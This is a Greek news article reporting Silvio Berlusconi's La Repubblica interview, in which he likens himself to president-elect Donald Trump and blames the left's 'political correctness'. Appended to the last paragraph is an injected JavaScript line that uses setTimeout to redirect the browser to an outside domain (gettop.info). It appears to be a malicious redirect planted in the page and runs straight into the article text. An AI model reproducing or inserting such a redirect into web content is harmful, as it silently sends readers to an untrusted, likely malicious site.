Μπερλουσκόνι: Προφανείς οι αναλογίες ανάμεσα σε μένα και τον Τραμπ

0
4

 

Ο Σίλβιο Μπερλουσκόνι, ένας δισεκατομμυριούχος που ανέβηκε στην εξουσία το 1994 στην Ιταλία χωρίς να έχει πολιτική πείρα, βλέπει «προφανείς αναλογίες» ανάμεσα στον ίδιο και τον εκλεγμένο πρόεδρο των ΗΠΑ Ντόναλντ Τραμπ, έναν επιχειρηματία που «σε κάποια στιγμή της ζωής του αποφάσισε να αφιερώσει τις ικανότητές του και την ενέργειά του στη χώρα του».

«Υπάρχουν κάποιες προφανείς αναλογίες, έστω κι αν η ιστορία μου ως επιχειρηματία είναι πολύ διαφορετική απ’ αυτή του Τραμπ, τον οποίο δεν είχα ποτέ την ευκαιρία να συναντήσω», δηλώνει ο Μπερλουσκόνι σε συνέντευξή του που δημοσιεύεται σήμερα από την εφημερίδα La Repubblica.

Σύμφωνα με τον μεγιστάνα των μέσων ενημέρωσης, ο οποίος κατέκτησε την εξουσία πάνω στα ερείπια της ιταλικής χριστανοδημοκρατίας μετά την επιχείρηση «Mani pulite» (καθαρά χέρια), ο Ντόναλντ Τραμπ «εξελέγη απ’ όλους τους Αμερικανούς που είχαν κουραστεί από μια παλιά πολιτική, κλεισμένη στον εαυτό της, η οποία είχε καταστεί ανίκανη να ακούει και να καταλαβαίνει».

Η πολιτική αυτή διέπραξε «το τυπικό λάθος που κάνει η αριστερά σ’ όλον τον κόσμο», διαβεβαιώνει.

«Το λάθος να πιστέψει πως η «πολιτική ορθότητα» είναι το μέσον για να βρίσκεται κοντά στους ανθρώπους, χωρίς να καταλαβαίνει ότι οι αληθινά αδύναμοι είναι οι πολίτες που έχουν εξουθενωθεί από το Κράτος, τους φόρους, τη γραφειοκρατία, την ανεξέλεγκτη μετανάστευση, την ανεργία, τον κίνδυνο της τρομοκρατίας. Και αυτό ισχύει για την Αμερική, όπως και για την Ιταλία και την Ευρώπη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here